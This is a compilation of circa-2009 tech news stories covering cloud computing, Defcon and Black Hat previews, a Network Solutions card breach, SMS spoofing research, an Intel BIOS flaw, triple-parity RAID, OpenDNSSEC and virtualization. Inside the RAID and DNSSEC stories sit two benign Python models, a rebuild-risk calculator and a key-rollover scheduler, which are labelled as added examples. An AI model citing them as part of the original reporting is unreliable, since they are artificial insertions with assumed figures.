Catchy, huh? Alas! This is my last InfoWorld Cloud Computing post. I've really enjoyed writing for you for the past seven months, but my mounting responsibilities mean it's time for me to bow out. I'm going to do a little less writing about cloud computing and a whole lot more working in the cloud. In fact, I've just posted a "Down-to-Earth look at Cloud Computing" podcast on BMC's new Cloud Computing Community.
Never fear. Neither I nor InfoWorld's Editor in Chief Eric Knorr would leave you in the lurch. David S. Linthicum (Dave) will be taking the helm, and man does he bring a lot of insight. Dave is an internationally recognized industry expert and thought leader. He's authored or coauthored 13 books on computing, including the best-selling "Enterprise Application Integration" (Addison Wesley). He's also a well-known keynote speaker on the conference circuit and works with several cloud computing startups. The column couldn't be in better hands. Before I sign off, I'll leave you with three things I would like you to take away from my time here:
1. Keep the hope; lose the hype.
It's really easy to get caught up in all of the hype surrounding cloud computing, and just as easy to lose hope in it when you've weeded through the overwhelming amount of crap that's out there. As I've said before, continuing to market cloud computing as the next magic bullet will guarantee dissatisfaction. We need a Windex-clear definition to take this buzzword from cotton candy to New York cheesecake. Eric has raised this flag several times in his blog, going so far as to offer the industry a standard definition: "the use of commercial computing services, including software-as-a-service applications, delivered over the Internet." It's up to us, the community, to make this tangible and concrete.
2. Be realistic about what you're getting into.
Once I asked readers: Does cloud computing eliminate complexity? Sure, cloud computing is a celebrated "new" technology, but we got ourselves all wrapped up in it before we understood its repercussions. Do yourself a favor and examine cloud offerings against some realistic metrics for what you and your organization consider success. And don't forget the Law of Unintended Consequences. Moving components from your internal infrastructure to the cloud probably won't reduce complexity, just brush it under the rug. "Out of sight, out of mind" sounds good until it's the foundation for your IT infrastructure.
3. Cloud computing isn't evil.
Privacy is important, but it's not the only issue. Regulatory compliance and a host of other potential challenges face companies deploying cloud technologies, but most of these will be worked out over time. Cloud computing isn't inherently good or evil; technology is technology. Its effects on your organization are a direct result of the planning and management you put into its deployment and operation.
There's my short list. Now I sign off for the last time. Thanks to Eric and InfoWorld for giving me the opportunity to participate in this community, and thanks to Dave Linthicum for stepping in to take over this column. If you're interested in following what's next for me, just add me on Twitter or drop me a line.
CNet: From iPhones to smart grids at Black Hat, Defcon
by Elinor Mills
My favorite security show each year is one at which there are no sales pitches, the speakers favor black T-shirts and dyed hair over suits and ties, and the talks tend to be controversial enough to prompt legal threats and even arrests.
I'm talking about Defcon, which starts Thursday and runs through Sunday. The event turns part of the Las Vegas strip into a geek equivalent of "Animal House" for a three-day weekend every summer.
Started in 1993 by Jeff Moss, aka Dark Tangent, Defcon brings together some of the top security experts from around the world, along with thousands of hacker wannabes whose pranks in previous years (hacking the elevators and ATMs and cementing the toilets, to name a few) have led to bans at certain hotels.
"One good thing about the (economic) downturn is that the Riviera Hotel has been easier to deal with," said Moss, who was recently named to the Homeland Security Advisory Council. "They're letting us have access to the pool, so we'll have pool parties, and they've allowed us to do more social things that we wanted to do."
In addition to being a hacker playground and summer camp, Defcon is a semi-neutral ground where people who blur the lines of legality mingle with federal agents whose job it is to hunt them down.
Moss also heads up Defcon's big-sister conference, Black Hat, whose briefings schedule runs Wednesday and Thursday at the more upscale but no less kitschy Caesars Palace. (Black Hat training sessions started over the weekend.)
While Black Hat is more professional, with vendor tables in the lobby and respectable product presentations in meeting rooms, Defcon is a chaotic tableau of goth-attired groupies, script kiddies hunkered over laptops lining the hallways at all hours of the night and gray-haired hackers who were likely teens when they first started coming to the event.
The presentations are usually top-notch (many of them duplicates from the more expensive Black Hat show), but Defcon is known just as much for the activities going on outside of the sessions.
There's Hacker Jeopardy, Hacker Karaoke, an artwork contest, geo-caching events, a beverage cooling contraption contest, organized target shooting, a Capture the Flag penetration testing competition, lock picking workshops, a PGP Key Signing Party, DJs, a scavenger hunt, the highly popular Spot the Fed contest, a competition to find the best social engineer and a Cannonball Run car race described as "a race against time over 288 miles of road" from Redondo Beach to Las Vegas on Thursday.
Despite the recession, both events are expected to be crowded.
"We had been expecting 30 percent fewer attendees and in reality we're only going to have 10 to 15 percent fewer," Moss said. "The market went down and all of this research came up."
The research topics run the gamut of vulnerabilities and exploits on everything from iPhones to smart grids. One session deals with air traffic control security (or lack thereof). Others have to do with injecting electromagnetic pulses into the wiring system of jets, insecurities with Firefox plug-ins, cloud computing security issues and a new tool to send controversial news to censored countries without using proxy servers.
Unveiling a darknet
Several researchers are going to release a tool for hacking into Oracle databases. Meanwhile, two Hewlett-Packard researchers plan to demonstrate a proof-of-concept browser-based darknet type of network called "Veiled" that allows for the creation of a secure, decentralized peer-to-peer network in which no client software is downloaded. "The clients are the owners of the files and there is no single point of failure," said Matt Wood, a senior researcher in the Web Security Research Group at HP Software and Solutions. "No one in the government can go to you and say 'we need the files.'"
Interesting session titles include "Cracking 400,000 Passwords, or How to Explain to Your Roommate why the Power Bill is a Little High," "Manipulation and Abuse of the Consumer Credit Reporting Agencies," "Hacking Capitalism '09," and "'Smart' Parking Meter Implementations, Globalism, and You (aka Meter Maids Eat Their Young)."
There's always a Meet the Fed panel with representatives from all the major defense and security-related government agencies. And well-known keynote speakers and presenters include Robert Lentz, chief security officer for the Department of Defense; Rod Beckstrom, former Director of the National Cyber Security Center in the U.S. Department of Homeland Security; Adam Savage, co-host of the "MythBusters" TV show; and perennial favorite Bruce Schneier, security guru and chief technology officer of BT Counterpane.
When hackers go public with details on exploits, vendors get nervous, and companies have moved to block presentations at the shows over the years. This year is no exception. Juniper Networks pulled a talk one of its researchers was set to give about a flaw in ATM software after the ATM vendor complained. In his presentation entitled "Jackpotting Automated Teller Machines," Barnaby Jack was planning to provide a live demonstration of an attack on an automated teller machine.
"I'm disappointed Barnaby Jack's talk was canceled," said Moss. Another speaker this year was "forced or encouraged" not to release a tool, Moss said, but he couldn't remember which speaker or talk it was.
Last year, a talk on hacking smartcards used in the Boston subway system was blocked after a federal judge granted the Massachusetts transit authority's request for an injunction. In 2005, a security researcher was sued after giving a presentation at Defcon on how attackers could take over Cisco Systems routers. And in 2001, the FBI took Russian crypto expert Dmitry Sklyarov into custody at his Las Vegas hotel the day after he gave a Defcon talk about insecurities in e-book security software. All cases were eventually settled.
Defcon averted another type of legal debacle this year: the importation of its microprocessor-dependent badges, which are needed for the badge-hacking contest.
"I'm excited the badges for Defcon will be here," Moss said gleefully. "They were held up in Chinese customs for two months. It was a complete nightmare."
TheRegister: Gov geek publishes 5000-word Twitter guide
by Joe Fay
The world was given an insight into how both Twitter and the UK's e-government work today, when the national media discovered a guide to using Twitter written by one of Whitehall's self-proclaimed in-house web geeks.
Neil Williams, head of corporate digital channels at the Department for Business, Innovation and Skills, quietly posted his compact 5,382-word guide to setting up UK.gov Twitter feeds here last week. Highlighting the lightning speed at which web 2.0 can work, by this morning it was plastered all over the papers.
The guide pitches Twitter as "free to use with a relatively low impact on resources (with) the potential to deliver many benefits in support of our communications objectives".
It is, Williams says, "experiencing a phenomenal adoption curve in the UK and being used increasingly by government departments, Members of Parliament, a number of our stakeholders as well as millions of businesses, non government organisations and individuals."
So of course, the government would be mad not to use it. It's not like you're going to be relying on bumping into the first three of these groups walking down Whitehall, or wandering around the palace of Westminster, or on the diplomatic cocktail round. And clearly the rest have given up on boring old newspapers, TV, radio, etc.
Williams advises his colleagues that using Twitter means government departments can present folk with "an informal, 'human' voice of the organisation to promote comprehension of and engagement with our corporate messages".
At the same time, he warns, there are risks associated with breaches of Twitter etiquette, such as "Criticism arising from an inability to meet the demands of Twitter users to join conversations/answer enquiries, due to resource and clearance issues".
Even worse, there is the risk of inappropriate content being unleashed. This of course should be managed through the traditional methods of leaking and briefing against one's political and departmental enemies.
Still, a credible operation can be up and running for just an hour a day's work from a department's Digital Media team, Williams reckons. That includes "sourcing and publishing tweets, co-ordinating replies to incoming messages and monitoring the account".
That's not all in one burst though. Messages - sorry, tweets - should be spaced at least 30 minutes apart, with a minimum of two tweets and a max of ten. Yes, that's how often and how much you need to show you're human.
We're not sure what the digital media team members will be doing the rest of the time, but we're imagining at least some of it will involve walking down Whitehall, wandering around the palace of Westminster, doing the diplomatic cocktail party round, etc.
We wondered how this sudden brush with fame had affected Williams. We went to his Twitter feed, naturally, but he now appears to be coyly protecting his tweets. His blog is up and running, though, and provides some background; amongst other things, he describes himself as a "lapsed comedy writer". ®
Wired: Hotseat: The Creator of Facebook's Most Annoying App Explains Himself
by Douglas Quenqua
By now, you probably know your Facebook friends' five favorite albums, TV stars, and sodas. Blame Tim O'Shaughnessy, creator of LivingSocial, the site's most-used and most-annoying application ever. We asked him to explain himself.
What inspired the app?
We heard rumors about Facebook's redesign and were thinking of ways to tap into the new stream concept. We wanted something that made it really, really easy for people to form opinions and then share them with everyone.
Do you think people hate you a little for that?
If LivingSocial is showing up in your stream, it's because your friends want you to know more about them. Talk to them, not us.
What do you do with all the data?
We go to marketers and say, "Here are a couple million people into music, and here are a couple million into movies." We're working with American Idol, Green Day, TNT, a lot of large brands.
Do you think folks realize you're making money off their confessions?
I think people understand that if something's free, there's some form of monetization involved.
List your least favorite things about Facebook.
One, apps aren't a part of Facebook on the iPhone, even though they're an integral part of the Facebook experience. Two, I wish Facebook would figure out news. And three, I wish Facebook would just hurry up and buy Twitter so there'd be less noise in the world.
CNet: Network Solutions breach exposes nearly 600,000
by Elinor Mills
Network Solutions is investigating a breach on its servers that may have led to the theft of credit card data of 573,928 people who made purchases on Web sites hosted by the company.
Network Solutions notified 4,343 of its nearly 10,000 e-commerce merchant customers on Friday about the breach. It affects 573,928 cardholders whose name, address, and credit card number were exposed between March 12 and June 8, said Susan Wade, a spokeswoman for Network Solutions.
Mysterious code was discovered in early June on servers hosting e-commerce customer sites during routine maintenance, she said. The company called in a third-party forensics team to help with the investigation, and the team was able to crack some of the code on July 13, determining that it could be related to credit card data, she added.
Credit card transactions were intentionally diverted by an unknown source from certain Network Solutions servers to servers outside, Network Solutions wrote in an e-mail to merchant customers.
"So we notified law enforcement and began the process of notifying our customers," Wade said. "At this point, we don't have a reason to believe that (the data) has been used, but we are working with the credit card companies," nonetheless.
Network Solutions also is paying to have credit-monitoring specialist TransUnion help the merchants notify their customers according to data breach notification laws in effect in certain states. Affected consumers will get 12 months of free credit-monitoring services.
It's unknown how the malicious code got onto the system and where it came from, Wade said.
Merchants and consumers can get more information on the Care and Protect Web site Network Solutions has set up. "We really feel terribly about this," Wade said.
"We store credit card data in an encrypted manner, and we are PCI (Payment Card Industry)-compliant. Unfortunately, any company operating in our business could have become a victim of this type of invasion," the company said on a blog post on the customer information Web site. "In this situation, the unauthorized code appears to have transmitted information about credit card transactions as they were being completed; it did not involve a vulnerability in the way we store data in our systems."
The breach does not affect Network Solutions' other businesses, which include domain registration, e-mail hosting, and online marketing.
TheRegister: Sun tripling RAID protection
by Chris Mellor
The RAID industry standard for storage is RAID-6, which recovers from a double drive failure. But it's not going to be good enough as disk capacities increase: bigger disks prolong failed-disk rebuild times, and that lengthens the window in which a third disk failure, arriving before recovery from the double failure is complete, becomes unrecoverable.
This point is made by Adam Leventhal of Oracle/Sun's Fishworks in a blog. He says hard drive capacity roughly doubles every year but hard drive bandwidth is pretty constant, so it takes longer and longer to write data to fill up a drive.
Other things being equal, a 500GB drive will take twice as long to write as a 250GB drive. Suppliers are now producing 2TB drives, which take four times as long to fill with data as a 500GB drive; Leventhal implies that this will take about eight hours.
Assume 3TB drives are coming, then 4TB ones, and we're looking at 12 hours and 16 hours respectively for a rebuild of a full failed disk. Every added terabyte adds four hours to the rebuild time, half a day. That increases the chance that a third drive fails while the first two failed drives are still being rebuilt.
Leventhal has added triple-parity RAID to Sun's ZFS filesystem, calling it RAIDz3. He suggests calling it generically RAID-7 or RAID-8 might be silly. RAID-6 is often known as RAID-DP though, so RAID-TP would seem logical. Leventhal says it too could be superseded if disk capacities keep on growing.
That has to be logically true but, if the use of 3.5-inch disks switches over to 2.5-inch drives then that would reduce failed disk rebuild times. It would also likely increase the number of drives in an array, putting us back, roughly speaking, at square one.
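The rebuild-time arithmetic above can be turned into a rebuild-window risk model. The following is an added example, not from the article or from Sun's ZFS code: it encodes the article's rule of thumb (4 hours per terabyte at constant drive bandwidth) and compares RAID-6 with triple parity after a double drive failure, as capacity and drive count grow. The MTBF figure and the constant-hazard (exponential) failure model are assumptions, not values from the article.

```python
"""Rebuild-window risk: RAID-6 versus triple-parity RAID.

Added example, not from the article or from Sun's ZFS code. It encodes the
article's rule of thumb (rebuild time grows with capacity at constant drive
bandwidth: 2TB -> 8h, +4h per extra TB) and then asks the question the
article raises: given a double drive failure, how likely is it that the
remaining parity is exceeded before the rebuild finishes? Drive failures
are modelled as independent with a constant hazard rate; the MTBF is an
assumption, not a figure from the article.
"""
from math import comb, exp

HOURS_PER_TB = 4.0                 # article: 2TB takes ~8h, each extra TB adds 4h
ASSUMED_MTBF_HOURS = 1_000_000.0   # assumption: vendor-datasheet order of magnitude


def rebuild_hours(capacity_tb: float) -> float:
    """Time to rewrite a full replacement drive at fixed bandwidth."""
    return HOURS_PER_TB * capacity_tb


def p_drive_fails_within(hours: float, mtbf_hours: float = ASSUMED_MTBF_HOURS) -> float:
    """Exponential model: chance that one healthy drive fails within `hours`."""
    return 1.0 - exp(-hours / mtbf_hours)


def p_loss_during_rebuild(n_drives: int, parity: int, already_failed: int,
                          capacity_tb: float,
                          mtbf_hours: float = ASSUMED_MTBF_HOURS) -> float:
    """Probability that enough *additional* drives fail during the rebuild
    window to exceed the parity still available.

    n_drives        drives in the parity group (data + parity)
    parity          2 for RAID-6, 3 for RAID-Z3 / RAID-TP
    already_failed  drives currently down and being rebuilt (in parallel)
    """
    survivors = n_drives - already_failed
    extra_needed = parity - already_failed + 1
    if extra_needed <= 0:
        return 1.0  # parity already exhausted: the data is gone
    p = p_drive_fails_within(rebuild_hours(capacity_tb), mtbf_hours)
    # P[X >= extra_needed] with X ~ Binomial(survivors, p)
    return sum(comb(survivors, k) * p ** k * (1.0 - p) ** (survivors - k)
               for k in range(extra_needed, survivors + 1))


def compare(n_drives: int, capacity_tb: float) -> dict:
    """The worst case the article describes: two drives already down.
    RAID-6 then dies on one more failure, triple parity on two more."""
    return {
        "rebuild_hours": rebuild_hours(capacity_tb),
        "raid6_loss": p_loss_during_rebuild(n_drives, 2, 2, capacity_tb),
        "raidz3_loss": p_loss_during_rebuild(n_drives, 3, 2, capacity_tb),
    }


if __name__ == "__main__":
    # Bigger drives widen the window; smaller drives tend to mean more
    # drives per array, which raises the count of survivors that can fail.
    for tb in (0.5, 2, 3, 4):
        for n in (12, 24):
            r = compare(n, tb)
            print(f"{tb:>4}TB x{n:>2}: rebuild {r['rebuild_hours']:5.1f}h  "
                  f"RAID-6 loss {r['raid6_loss']:.2e}  "
                  f"RAID-Z3 loss {r['raidz3_loss']:.2e}")
```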
Triple-parity RAID-Z will be included in the next major software release for Oracle/Sun's 7000 series sometime in the third quarter of this year; in other words, in a few weeks. It's not a first though - Avante Digital had a triple-parity EasyRAID product in 2006.
We might expect triple-parity RAID to start appearing, perhaps as an option, in mainstream enterprise EMC, HDS, IBM and NetApp arrays, and third-party RAID controllers from next year. ®
InfoWorld: Some SMS networks vulnerable to attack
by Robert McMillan
Flaws in the way some mobile-phone networks handle SMS (short message service) signaling data could leave them open to a whole new range of attacks.
At this week's Black Hat conference in Las Vegas, researchers Zane Lackey and Luis Miras will show how they were able to spoof SMS and MMS (multimedia messaging service) messages and falsify the signaling data that underlies these messages.
Neither researcher was able to comment for this story, but in a description of their Thursday talk, posted to the Black Hat Web site, they say that they plan to release SMS hacking tools and will demonstrate an iPhone-based application that can be used in several SMS attacks. "SMS is also one of the only mobile phone attack surfaces which is on by default and requires almost no user interaction to be attacked," they say in their talk abstract.
The researchers were able to send SMS messages from one phone to another that contained configuration information that would normally originate only on the network's servers, according to a source familiar with the talk, who spoke on condition of anonymity because he was not authorized to speak on the matter. The research details security flaws in the way some mobile networks communicate with the devices on the network. "Basically, they found that there is a way to bypass all of the source sender validation," the source said.
The iPhone tool, which runs on a jailbroken version of the device, lets them send SMS messages with data that should normally only be sent from the carrier network, the source said. "They have found a new attack vector by which people can try to exploit phones based upon invalid assumptions the network operators and the phone operators have made about the security of this communications channel."
The attack works on the GSM (Global System for Mobile Communications)-based networks used by carriers such as AT&T and T-Mobile, but does not work on CDMA (Code Division Multiple Access) networks, he said.
It's not clear how dangerous such an SMS-based attack could be, or what exactly the researchers were able to do with their spoofed messages, but carriers use SMS to send basic configuration to the phones. In theory, an attacker might be able to use this technique to redirect a phone's Web browser to a malicious server or change voicemail notifications.
"We will discuss attacking the core SMS and MMS implementations themselves, along with 3rd party functionality that can be reached via SMS," the researchers write in their abstract.
SMS uses a communications channel that was designed as a way for network operators to send basic status updates between mobile phones and the network, and only later did it evolve as an extremely popular way to send short messages between mobile-phone users.
The network servers that handle SMS traffic are built by companies such as Ericsson, Nortel, Lucent and Nokia Siemens.
Mobile carriers have long tightly controlled the software and devices that can be used on their networks, but apparently, these networks are not as tightly controlled as was previously thought. "They're not as open as the Internet, but there are definitely lots of bad things that you can do that people never expected," the source said. "There are lots of malicious things you can do."
CNet: Intuit and open source: Tastes great, less filling?
by Matt Asay
Intuit announced on Monday that it has launched a community site for open-source developers to write open-source SaaS (software as a service) applications that enhance Intuit's own SaaS platform. Glyn Moody derides the move as "a rather feeble attempt to plug into the power of openness without really engaging with it," but this misses the point.
The point is to enhance the value around an already valuable platform (Intuit's software). This isn't just of benefit to Intuit, but also to the third-party developers who contribute. No one wants to write software to sit on a shelf, unused. Coding for Intuit ensures a ready-made audience of small businesses.
What's not to like about that?
IBM's Savio Rodrigues notes that this same effect could have been achieved with a closed-source community site, but he suggests a few reasons open source makes the community site richer:
(B)y using an open source license, Intuit reduces a potential issue for its partners that do sell open source products on top of Intuit's platform. Intuit also makes it easier for its partners to customize the code for their own purposes, something that partners are likely to do. Lastly, the open source license encourages Intuit's ecosystem to contribute their own components and, thereby, helps raise all boats, without having to open source Intuit's core products. It seems like a win-win to me.
Agreed. Intuit clearly "gets" that open source is a means to an end, not an end in and of itself. Openness helps the company accomplish community and corporate goals. It helps to enrich its partner experience. But it's not a revenue model that the company is embracing.
Some will see this move by Intuit as more about artifice than community, but they will be wrong. The Intuit community stands to benefit greatly from this move. As with Microsoft before it, these Intuit partners are looking for ways to enhance the value of their offerings while building on a winning platform.
Open source helps them to do that, as ZDNet's Sam Diaz points out, while also helping Intuit to increase the value of its platform. It's a win-win situation.
TheRegister: Intel warns over bare-metal BIOS bug
by John Leyden
Intel has warned that some of its motherboards contain a flaw in their BIOS setup that creates a privilege escalation vulnerability.
As a result of the security bug, users already logged in as administrators could change code running in System Management Mode. SMM is a privileged operating environment that operates outside of operating system control, creating a possible mechanism (at least in theory) for mounting rootkit-style attacks on vulnerable systems.
Exploiting the bug would probably require physical access to affected systems, a fair amount of skill and not a little luck in locating a vulnerable box.
Desktop and server systems are both potentially affected by the bug, described by Intel as "important", so the flaw still merits close attention.
BIOS updates designed to mitigate against attack are available for vulnerable Intel motherboards, as explained in an advisory by the chip giant issued on Wednesday.
Intel lists the following desktop motherboards as potentially vulnerable: D5400XS, DX58SO, DX48BT2, DX38BT, DP45SG, DQ45CB, DQ45EK, DQ43AP, DB43LD, DG41MJ, DG41RQ, DG41TY, DG45ID, DG45FC, DG43NB, DP43TF, DQ35JO, DQ35MP, DG33BU, DG33FB, DG33TL, DP35DP, D945GSEJT, D945GCLF, D945GCLF2.
Intel Server Boards in the S3000, S3200, S5000 series, S5400 series, and S5500 series also need a BIOS update.
BIOS-related security flaws are rare but not unprecedented. The latest bug was discovered by researchers from Invisible Things Lab. Last year, the same researchers detailed a high-privilege rootkit vulnerability in the Xen hypervisor that Intel addressed via a BIOS update.
Invisible Things is due to present new research on attacking Intel BIOS at this week's Black Hat conference in Las Vegas, which is likely to be dominated by a detailed dissection of the issues arising from Intel's latest BIOS security advisory. ®
InfoWorld: Open source project aims to make secure DNS easier
by Jeremy Kirk
A group of developers has released open-source software that gives administrators a hand in making the Internet's addressing system less vulnerable to hackers.
The software, called OpenDNSSEC, automates many tasks associated with implementing DNSSEC (Domain Name System Security Extensions), a set of protocols that allows DNS (Domain Name System) records to carry a digital signature, said John A. Dickinson, a DNS consultant working on the project.
DNS records translate a Web site's name into the IP (Internet Protocol) address that computers actually connect to. But the DNS system has several flaws dating from its original design that are increasingly being targeted by hackers.
By tampering with a DNS server, an attacker can arrange for a user who types in the correct Web site name to be directed to a fraudulent site, a type of attack called cache poisoning. That's one of many concerns driving a movement for ISPs and other entities running DNS servers to use DNSSEC.
With DNSSEC, DNS records are cryptographically signed, and those signatures are verified to ensure the information is accurate. Adoption of DNSSEC, however, has been held back by both the complexity of implementation and a lack of simpler tools, Dickinson said.
To sign DNS records, DNSSEC uses public key cryptography: signatures are created with a private key, verified with the corresponding public key, and applied at the zone level. Part of the problem is management of those keys, since they must be refreshed periodically to maintain a high level of security, Dickinson said. A mistake in managing those keys could cause major problems, which is one of the challenges for administrators.
OpenDNSSEC allows administrators to create policies and then automate managing the keys and signing the records, Dickinson said. The process now involves more manual intervention, which increases the chance for errors.
OpenDNSSEC "takes care of making sure that zone stays signed properly and correctly according to the policy on a permanent basis," Dickinson said. "All of that is completely automated so that the administrator can concentrate on doing DNS and let the security work in the background."
The software also has a key storage feature that lets administrators keep keys in either a hardware security module or a software key store, an additional layer of protection that ensures keys don't end up in the wrong hands, Dickinson said.
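The policy-driven key management described above can be made concrete. The following is an added example, not OpenDNSSEC's own code or its policy file format: it models a ZSK pre-publish rollover, deriving from a policy (key lifetime, DNSKEY TTL, largest zone TTL, propagation delay) when each successor key must be published, made active, retired and removed, and checking that no step strands cached signatures without their DNSKEY. The timing rules follow the pre-publish rollover of RFC 6781; the key tags and policy values are constructed.

```python
"""Policy-driven DNSSEC ZSK rollover schedule (pre-publish method).

Added example; not OpenDNSSEC's code or its policy format. It models the
job the article says OpenDNSSEC automates: from a policy, derive the
publish / active / retire / remove times for a chain of zone-signing keys
and check the schedule against the two mistakes that break validation:
activating a key before resolvers can have seen its DNSKEY, and removing a
retired key while signatures it made can still sit in caches.
"""
from dataclasses import dataclass
from typing import List, Set


@dataclass(frozen=True)
class Policy:
    key_lifetime: int   # seconds a ZSK is used to sign the zone
    dnskey_ttl: int     # TTL of the DNSKEY RRset
    max_zone_ttl: int   # largest TTL among the signed RRsets
    propagation: int    # worst-case delay for a zone change to reach all secondaries

    def prepublish_interval(self) -> int:
        # A validator may hold the old DNSKEY RRset for dnskey_ttl after the
        # last secondary serves the new zone, so the successor must be in
        # the RRset at least this long before it starts signing.
        return self.dnskey_ttl + self.propagation

    def retention_interval(self) -> int:
        # Signatures by the retired key may be cached for up to max_zone_ttl
        # after the last secondary re-signed; keep its DNSKEY until then.
        return self.max_zone_ttl + self.propagation


@dataclass(frozen=True)
class KeyTimeline:
    key_tag: int   # constructed identifier standing in for the DNSKEY key tag
    publish: int
    active: int
    retire: int
    remove: int


def schedule(policy: Policy, n_keys: int, start: int = 0) -> List[KeyTimeline]:
    """Chain n_keys ZSKs so each successor becomes active the instant its
    predecessor retires. All times are seconds relative to `start`."""
    timeline = []
    active = start
    for tag in range(1, n_keys + 1):
        publish = active - policy.prepublish_interval()
        retire = active + policy.key_lifetime
        remove = retire + policy.retention_interval()
        timeline.append(KeyTimeline(tag, publish, active, retire, remove))
        active = retire
    return timeline


def published_keys_at(timeline: List[KeyTimeline], t: int) -> Set[int]:
    """Key tags present in the DNSKEY RRset at time t."""
    return {k.key_tag for k in timeline if k.publish <= t < k.remove}


def active_keys_at(timeline: List[KeyTimeline], t: int) -> Set[int]:
    """Key tags actually producing RRSIGs at time t."""
    return {k.key_tag for k in timeline if k.active <= t < k.retire}


def violations(timeline: List[KeyTimeline], policy: Policy) -> List[str]:
    """The checks a policy engine should run before every re-signing pass."""
    problems = []
    for k in timeline:
        if k.active - k.publish < policy.prepublish_interval():
            problems.append(f"key {k.key_tag}: activated before pre-publish interval elapsed")
        if k.remove - k.retire < policy.retention_interval():
            problems.append(f"key {k.key_tag}: removed while its signatures may still be cached")
    for prev, nxt in zip(timeline, timeline[1:]):
        if nxt.active != prev.retire:
            problems.append(f"keys {prev.key_tag}->{nxt.key_tag}: gap or overlap in active period")
    return problems


if __name__ == "__main__":
    # Constructed policy: 30-day ZSK lifetime, 1h DNSKEY TTL, 1-day max TTL, 2h propagation.
    policy = Policy(key_lifetime=30 * 86400, dnskey_ttl=3600,
                    max_zone_ttl=86400, propagation=7200)
    for k in schedule(policy, 3):
        print(f"key {k.key_tag}: publish={k.publish:>9} active={k.active:>9} "
              f"retire={k.retire:>9} remove={k.remove:>9}")
```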
The OpenDNSSEC software is available for download, although it is being offered as a technology preview and shouldn't be used yet in production, Dickinson said. Developers will gather feedback on the tool and release improved versions in the near future.
As of earlier this year, most top-level domains, such as those ending in ".com," were not cryptographically signed, and neither were those in the DNS root zone, the master list of where computers can go to look up an address in a particular domain. VeriSign, which is the registry for ".com," said in February it will implement DNSSEC across top-level domains including .com by 2011.
Other organizations are also moving toward using DNSSEC. The U.S. government has committed to using DNSSEC for its ".gov" domain. Operators of other ccTLDs (country-code top-level domains), in Sweden (.se), Brazil (.br), Puerto Rico (.pr) and Bulgaria (.bg), are also using DNSSEC.
CNet: Open source may be your only ticket out of the cloud
by Matt Asay
Enterprise IT sometimes behaves like the group of teenagers I counsel on a weekly basis as part of my church responsibilities: "Damn the future, let's live for the present!"
Stephen O'Grady offers a pungent critique of this nearsighted tendency in enterprise IT, especially as it pertains to the cloud:
Very much like Apple on the consumer level, (commercial cloud providers) Google et al demand sacrifices in return for convenience. Perhaps, or make that likely, realizing that businesses will invariably sacrifice the future at the altar of the present. We'll give you the convenience and time to market now; just don't expect to leave later. And it's hard to blame (enterprise IT) for that, honestly. They've got jobs to do and kids to feed, and their blind trust in the technology industry to police itself and not lock them in this time as they've been locked in so many times before is as Peanuts touching as it is naive. Whether Lucy will yank the football out from under them yet again depends, as far as I can tell, on open source.
Why open source? Because open source helps to keep vendors like Google and Amazon honest by offering open alternatives to closed clouds (e.g., Eucalyptus).
Also, it's very possible that cloud computing will be nudged open in important ways due to the furor raised over proprietary practices.
This isn't simply a matter of open-source advocates castigating companies for locking in customers. It's also a clever sales tactic that an increasing array of companies will use to win over customers leery of signing over their data to a proprietary cloud provider, seemingly once and for all.
As the cloud gains relevance, we'll see an increasing array of companies that deliver software as a service (SaaS), but provide an "eject" mechanism via open-source, on-premise offerings. SugarCRM does this now, and I think we'll begin to see this more and more often.
The reality is that the service will be compelling enough to keep customers from bolting. But offering the safety blanket is worthwhile, even if no one ever uses it (and, frankly, I doubt many will, because very few are capable of running their own cloud, and even fewer want to).
O'Grady concludes that "Whether open source takes a role front and center...remains to be seen, but it is certain that it will - as it has to date - have a crucial role in shaping the cloud market to come." How significant that role is, is largely up to us.
Disclosure: I am an advisor to SugarCRM.
TheRegister: Virtualization rocks - but who cares beyond consolidation?
by Dale Vile
Reader Workshop: roundup of discussion from Week 1. The feedback on virtualization experiences from those participating so far in our latest online workshop has been generally very positive.
A main focus of the comments has been on server consolidation and the cost savings that come with it, and some of the results achieved seem pretty impressive:
We're running about 15 VMs per server: a mix of Windows and FreeBSD mostly, some high power (e.g. mail), some low power, but there's still plenty of room for more. Virtualization rocks.
Yeah, it's great. We've squished over 50 intermittent-use/low-load internal servers into 6U of space.
"I work for local government, and we have consolidated close to 25:1 on x86 Windows servers over a 2 year period. We also have been re-deploying virtualised hardware servers (if decent spec/age) instead of purchasing new hardware servers."
We have been studying the benefits of virtualization and have started deploying it at a larger scale since last year. We were planning for a 10:1 to 16:1 consolidation ratio. I believe we are targeting 14:1 to 20:1.
A couple of readers, however, challenged this, asking whether high consolidation ratios say more about how poorly the server environment was run beforehand:
How were people running boxes at <5% capacity before this?
If you do though run lightly loaded apps then you don't need a VM to run several of them on the same physical server; you just install them directly. For managing resources, then, VMs seem to gain you nothing. So what's the win? Do departments just get sloppy with resource management or what?
Those with experience stood their ground, though, and came back with points highlighting some of the operational, risk and quality-of-service benefits:
...Which is all well and good until two vendors' packages conflict. Or you have to tell the people using the other 10 applications you installed 'Sorry, rebooting the server, nothing to do with your stuff, it's the other guy's, but it's all on the same box...'. Virtualization minimizes the hardware while still keeping each vendor's tech support happy and minimizing conflicts and single-points-of-failure.
25 apps on the same OS install, with overlapping ports, libraries, web servers, drivers... one vulnerability in 1 app and a hacker has all of your infrastructure, nice. Need to do a hardware update? That's just your entire business down while you re-install 25 apps. Have a poor app with a memory leak = crash entire business for a while, instead of 1 app down.
The benefit of virtualization to our disaster recovery solution can't be overstated. We back up virtual machine folders on to disk and tape. Simple, fast, no expensive 'backup agents' or other complexity required, and they can be restored onto any hardware.
Other benefits highlighted include the ability to run a higher proportion of your applications on high availability hardware, something which can be cost-prohibitive when your server estate is fragmented across a large number of under-utilised single function servers. The ability to run up test and development environments on demand, and respond quickly and easily to other requirements for other tactical applications without having to procure and provision new servers, was also cited.
We also shouldn't forget that in a smaller environment with relatively light loads there is nothing wrong with being left with spare capacity after a consolidation exercise: the operational and service-delivery benefits readers called out still exist even if you aren't squeezing every last usable cycle out of your kit:
Currently running 4-5 VMs per physical server and seeing very low usage (12-15% CPU) as we have a small user base.
But the feedback wasn't all positive. One of the downsides mentioned during the discussion, for example, was the real cost of implementing a virtualised environment, which sometimes only becomes apparent down the line:
Didn't spend enough on the disk storage, and now we have run out. Upgrading this is going to cost lots, possibly more than the initial roll out. We [also] maxed out our memory at the time. Sadly we have used pretty much all of it and again this will cost lots to upgrade.
...we may save tons of money on the server hardware, but we spend the savings on the software and supporting [network and storage] hardware... every four physical servers we buy needs to come with a networked disk, and a switch (or two)
The only blockage at the moment is cost; once it is cheaper to virtualise all our kit than to maintain the existing setup, we'll probably end up with one massive NAS and virtual suite, and the only external remaining part being backups
